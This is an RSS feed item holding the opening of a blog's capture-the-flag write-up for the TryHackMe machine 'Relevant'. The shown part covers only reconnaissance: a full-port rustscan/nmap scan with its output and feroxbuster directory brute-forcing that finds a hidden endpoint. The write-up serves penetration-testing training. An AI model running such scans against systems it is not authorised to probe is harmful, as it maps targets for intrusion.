<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Windows on CrippledMind's InfoSec Journal</title><link>https://crippledmind-infosec-journal.netlify.app/categories/windows/</link><description>Recent content in Windows on CrippledMind's InfoSec Journal</description><generator>Hugo -- gohugo.io</generator><language>en-us</language><lastBuildDate>Sun, 16 Jun 2024 18:26:06 +0530</lastBuildDate><atom:link href="https://crippledmind-infosec-journal.netlify.app/categories/windows/index.xml" rel="self" type="application/rss+xml"/><item><title>Relevant</title><link>https://crippledmind-infosec-journal.netlify.app/posts/writeups/thm/relevant/</link><pubDate>Sun, 16 Jun 2024 18:26:06 +0530</pubDate><guid>https://crippledmind-infosec-journal.netlify.app/posts/writeups/thm/relevant/</guid><description>&lt;h2 id="introduction">Introduction
&lt;/h2>&lt;ul>
&lt;li>&lt;strong>Machine Name:&lt;/strong> Relevant&lt;/li>
&lt;li>&lt;strong>IP Address:&lt;/strong> [IP Address]&lt;/li>
&lt;li>&lt;strong>Difficulty:&lt;/strong> Medium&lt;/li>
&lt;/ul>
&lt;h2 id="information-gathering">Information Gathering
&lt;/h2>&lt;p>I started scan with &lt;a class="link" href="https://github.com/RustScan/RustScan" target="_blank" rel="noopener"
>&lt;code>rustscan&lt;/code>&lt;/a>, found port 80, 49663 and 445 ports open.
These are the most common ports for getting initial foothold, but 49663 is very uncommon(so suspicious).&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-lua" data-lang="lua">&lt;span class="line">&lt;span class="cl">&lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">rustscan&lt;/span> &lt;span class="c1">--ulimit 5000 -r 1-65535 -a $IP -- -Pn -A -T4 | tee -a scan.txt&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">PORT&lt;/span> &lt;span class="n">STATE&lt;/span> &lt;span class="n">SERVICE&lt;/span> &lt;span class="n">REASON&lt;/span> &lt;span class="n">VERSION&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">80&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">tcp&lt;/span> &lt;span class="n">filtered&lt;/span> &lt;span class="n">http&lt;/span> &lt;span class="n">no&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">response&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">135&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">tcp&lt;/span> &lt;span class="n">open&lt;/span> &lt;span class="n">msrpc&lt;/span> &lt;span class="n">syn&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">ack&lt;/span> &lt;span class="n">Microsoft&lt;/span> &lt;span class="n">Windows&lt;/span> &lt;span class="n">RPC&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">139&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">tcp&lt;/span> &lt;span class="n">open&lt;/span> &lt;span class="n">netbios&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">ssn&lt;/span> &lt;span class="n">syn&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">ack&lt;/span> &lt;span class="n">Microsoft&lt;/span> &lt;span class="n">Windows&lt;/span> &lt;span class="n">netbios&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">ssn&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">445&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">tcp&lt;/span> &lt;span class="n">filtered&lt;/span> &lt;span class="n">microsoft&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">ds&lt;/span> &lt;span class="n">no&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">response&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">3389&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">tcp&lt;/span> &lt;span class="n">open&lt;/span> &lt;span class="n">ms&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">wbt&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">server&lt;/span> &lt;span class="n">syn&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">ack&lt;/span> &lt;span class="n">Microsoft&lt;/span> &lt;span class="n">Terminal&lt;/span> &lt;span class="n">Services&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">rdp&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">ntlm&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">info&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">Target_Name&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">RELEVANT&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">NetBIOS_Domain_Name&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">RELEVANT&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">NetBIOS_Computer_Name&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">RELEVANT&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">DNS_Domain_Name&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">Relevant&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">DNS_Computer_Name&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">Relevant&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">Product_Version&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mf">10.0.14393&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span>&lt;span class="n">_&lt;/span> &lt;span class="n">System_Time&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">2024&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">06&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">16&lt;/span>&lt;span class="n">T13&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">32&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">28&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="mi">00&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">00&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span>&lt;span class="n">_ssl&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">date&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">2024&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">06&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">16&lt;/span>&lt;span class="n">T13&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">33&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">08&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="mi">00&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">00&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="n">s&lt;/span> &lt;span class="n">from&lt;/span> &lt;span class="n">scanner&lt;/span> &lt;span class="n">time&lt;/span>&lt;span class="p">.&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">ssl&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">cert&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">Subject&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">commonName&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">Relevant&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">Issuer&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">commonName&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">Relevant&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">Public&lt;/span> &lt;span class="n">Key&lt;/span> &lt;span class="n">type&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">rsa&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">Public&lt;/span> &lt;span class="n">Key&lt;/span> &lt;span class="n">bits&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">2048&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">Signature&lt;/span> &lt;span class="n">Algorithm&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">sha256WithRSAEncryption&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">Not&lt;/span> &lt;span class="n">valid&lt;/span> &lt;span class="n">before&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">2024&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">06&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">15&lt;/span>&lt;span class="n">T13&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">22&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">30&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">Not&lt;/span> &lt;span class="n">valid&lt;/span> &lt;span class="n">after&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">2024&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">12&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">15&lt;/span>&lt;span class="n">T13&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">22&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">30&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">MD5&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mi">3899&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">9&lt;/span>&lt;span class="n">add&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">605&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">3667&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">4142&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">6&lt;/span>&lt;span class="n">b8b&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mf">7e42&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">36&lt;/span>&lt;span class="n">ea&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">SHA&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">fc71&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">3924&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">4&lt;/span>&lt;span class="n">a7e&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="n">c01&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="n">bb51&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">9465&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">4800&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">5&lt;/span>&lt;span class="n">f04&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="n">f2ac&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="n">d73b&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="c1">-----BEGIN CERTIFICATE-----&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">MIIC1DCCAbygAwIBAgIQfCiYuHMheZpPNXVuApyXhTANBgkqhkiG9w0BAQsFADAT&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">MREwDwYDVQQDEwhSZWxldmFudDAeFw0yNDA2MTUxMzIyMzBaFw0yNDEyMTUxMzIy&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">MzBaMBMxETAPBgNVBAMTCFJlbGV2YW50MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">MIIBCgKCAQEAts8eZAiC029jcGXhUL68IXseXFWcgqXCiDU4X7Ba811bVw9ESy70&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">iVO76DBONGsr4Yd5&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">dhHXtxBv6PfcjBCqc6g&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="n">CtR0&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">hfDPp&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="n">ml5P&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="n">uw4AZUTyfrY&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="mi">6&lt;/span>&lt;span class="n">hVQqLBXojAlHt&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">avwYgxLdUO0LeonbHOEKD7GYTKUeXmzHRVnJWSu&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="n">ig4&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="n">DjLX&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">Qy5rb5s8b&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="n">bEB7IXhTamR&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="n">VE43nmbk3uwZPvYnVFpOMh0GgzUYz37uU5wK1aUofe&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">mZk0J4LJXAR3l0V5StbaHp5XNb2AB2YHp2Pw7CundO6JB9zfmbSLujjjU4VUNqYw&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="mi">2&lt;/span>&lt;span class="n">ptgSJZkV35&lt;/span>&lt;span class="o">//&lt;/span>&lt;span class="n">bqgEeHCRpNNCqVu6YhTVwIDAQABoyQwIjATBgNVHSUEDDAKBggr&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBACFbjHjCdSkY&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">De8PKuIF84qpcBet8saz5BbapeobNdCtpNybCHLtnDy2tHbsxS&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="n">OnGmtEN3cAaf&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">za2WoiMUcoD56nrx7vE02CuZGcnfgXN2G2sxxmCOZdRAMg257UWITeJLQH9zWZ5H&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">Iikuk&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">rZIklL8ieX9&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="n">Ad2UeX4O843UsrxEfjnC0ZtcO&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="n">wZRlmYvKHj4ew&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="mi">5&lt;/span>&lt;span class="n">s&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">f4&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">gOOTZXCvc6zrLxrxQiYbxbVHlUgLwyhKgD&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">vq8YIvX27&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="n">mHZseMHzKD9QRhAlbkj&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">Pz57I37Z3vkXsuI&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">i2bJc4gttrjH3lQqoMWYTI9dj1&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="n">W08XzDgnhtIf5aTAiwsP&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">rtieJbN7gm8&lt;/span>&lt;span class="o">=&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span>&lt;span class="n">_&lt;/span>&lt;span class="c1">-----END CERTIFICATE-----&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">49663&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">tcp&lt;/span> &lt;span class="n">open&lt;/span> &lt;span class="n">http&lt;/span> &lt;span class="n">syn&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">ack&lt;/span> &lt;span class="n">Microsoft&lt;/span> &lt;span class="n">IIS&lt;/span> &lt;span class="n">httpd&lt;/span> &lt;span class="mf">10.0&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span>&lt;span class="n">_http&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">title&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">IIS&lt;/span> &lt;span class="n">Windows&lt;/span> &lt;span class="n">Server&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">http&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">methods&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="n">Supported&lt;/span> &lt;span class="n">Methods&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">OPTIONS&lt;/span> &lt;span class="n">TRACE&lt;/span> &lt;span class="n">GET&lt;/span> &lt;span class="n">HEAD&lt;/span> &lt;span class="n">POST&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span>&lt;span class="n">_&lt;/span> &lt;span class="n">Potentially&lt;/span> &lt;span class="n">risky&lt;/span> &lt;span class="n">methods&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">TRACE&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span>&lt;span class="n">_http&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">server&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">header&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">Microsoft&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">IIS&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="mf">10.0&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">49667&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">tcp&lt;/span> &lt;span class="n">filtered&lt;/span> &lt;span class="n">unknown&lt;/span> &lt;span class="n">no&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">response&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">49669&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">tcp&lt;/span> &lt;span class="n">filtered&lt;/span> &lt;span class="n">unknown&lt;/span> &lt;span class="n">no&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">response&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">Service&lt;/span> &lt;span class="n">Info&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">OS&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">Windows&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="n">CPE&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">cpe&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">o&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="n">microsoft&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="n">windows&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h3 id="port-80">Port 80
&lt;/h3>&lt;p>The root just hosts a Microsoft IIS default server, will dirbust with feroxbuster. I generally use two wordlists,&lt;/p>
&lt;ul>
&lt;li>raft-medium-directories-lowercase.txt&lt;/li>
&lt;li>directory-list-2.3-medium.txt&lt;/li>
&lt;/ul>
&lt;p>Deadend!!!&lt;/p>
&lt;h3 id="port-49663">Port 49663
&lt;/h3>&lt;p>Interestingly, I found a endpoint &lt;code>nt4wrksv&lt;/code> with the second list. This machine makes us learn the importance of patience in enumeration, because the directory folder in the second list was at the very last. So i had to go through whole big list to get this endpoint.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-lua" data-lang="lua">&lt;span class="line">&lt;span class="cl">&lt;span class="o">~/&lt;/span>&lt;span class="n">Pentesting&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Tryhackme&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">relevant&lt;/span> &lt;span class="n">node&lt;/span> &lt;span class="n">system&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">&amp;gt;&lt;/span> &lt;span class="n">feroxbuster&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">w&lt;/span> &lt;span class="err">$&lt;/span>&lt;span class="n">SECLISTS&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Discovery&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Web&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">Content&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">directory&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">list&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mf">2.3&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">medium.txt&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">u&lt;/span> &lt;span class="n">http&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="o">//&lt;/span>&lt;span class="mf">10.10.178.5&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">49663&lt;/span>&lt;span class="o">/&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">C&lt;/span> &lt;span class="mi">400&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="mi">404&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="mi">503&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">n&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">___&lt;/span> &lt;span class="n">___&lt;/span> &lt;span class="n">__&lt;/span> &lt;span class="n">__&lt;/span> &lt;span class="n">__&lt;/span> &lt;span class="n">__&lt;/span> &lt;span class="n">__&lt;/span> &lt;span class="n">___&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span>&lt;span class="n">__&lt;/span> &lt;span class="o">|&lt;/span>&lt;span class="n">__&lt;/span> &lt;span class="o">|&lt;/span>&lt;span class="n">__&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">|&lt;/span>&lt;span class="n">__&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">|&lt;/span> &lt;span class="o">/&lt;/span> &lt;span class="err">`&lt;/span> &lt;span class="o">/&lt;/span> &lt;span class="err">\&lt;/span> &lt;span class="err">\&lt;/span>&lt;span class="n">_&lt;/span>&lt;span class="o">/&lt;/span> &lt;span class="o">|&lt;/span> &lt;span class="o">|&lt;/span> &lt;span class="err">\&lt;/span> &lt;span class="o">|&lt;/span>&lt;span class="n">__&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">|&lt;/span> &lt;span class="o">|&lt;/span>&lt;span class="n">___&lt;/span> &lt;span class="o">|&lt;/span> &lt;span class="err">\&lt;/span> &lt;span class="o">|&lt;/span> &lt;span class="err">\&lt;/span> &lt;span class="o">|&lt;/span> &lt;span class="err">\&lt;/span>&lt;span class="n">__&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="err">\&lt;/span>&lt;span class="n">__&lt;/span>&lt;span class="o">/&lt;/span> &lt;span class="o">/&lt;/span> &lt;span class="err">\&lt;/span> &lt;span class="o">|&lt;/span> &lt;span class="o">|&lt;/span>&lt;span class="n">__&lt;/span>&lt;span class="o">/&lt;/span> &lt;span class="o">|&lt;/span>&lt;span class="n">___&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">by&lt;/span> &lt;span class="n">Ben&lt;/span> &lt;span class="s2">&amp;#34;epi&amp;#34;&lt;/span> &lt;span class="n">Risher&lt;/span> &lt;span class="err">🤓&lt;/span> &lt;span class="n">ver&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="mf">2.10.3&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="err">───────────────────────────┬──────────────────────&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="err">🎯&lt;/span> &lt;span class="n">Target&lt;/span> &lt;span class="n">Url&lt;/span> &lt;span class="err">│&lt;/span> &lt;span class="n">http&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="o">//&lt;/span>&lt;span class="mf">10.10.178.5&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="mi">49663&lt;/span>&lt;span class="o">/&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="err">🚀&lt;/span> &lt;span class="n">Threads&lt;/span> &lt;span class="err">│&lt;/span> &lt;span class="mi">50&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="err">📖&lt;/span> &lt;span class="n">Wordlist&lt;/span> &lt;span class="err">│&lt;/span> &lt;span class="o">/&lt;/span>&lt;span class="n">Users&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">vikas&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Pentesting&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">hacking&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">SecLists&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Discovery&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">Web&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">Content&lt;/span>&lt;span class="o">/&lt;/span>&lt;span class="n">directory&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">list&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mf">2.3&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="n">medium.txt&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="err">💢&lt;/span> &lt;span class="n">Status&lt;/span> &lt;span class="n">Code&lt;/span> &lt;span class="n">Filters&lt;/span> &lt;span class="err">│&lt;/span> &lt;span class="p">[&lt;/span>&lt;span class="mi">400&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">404&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">503&lt;/span>&lt;span class="p">]&lt;/span>
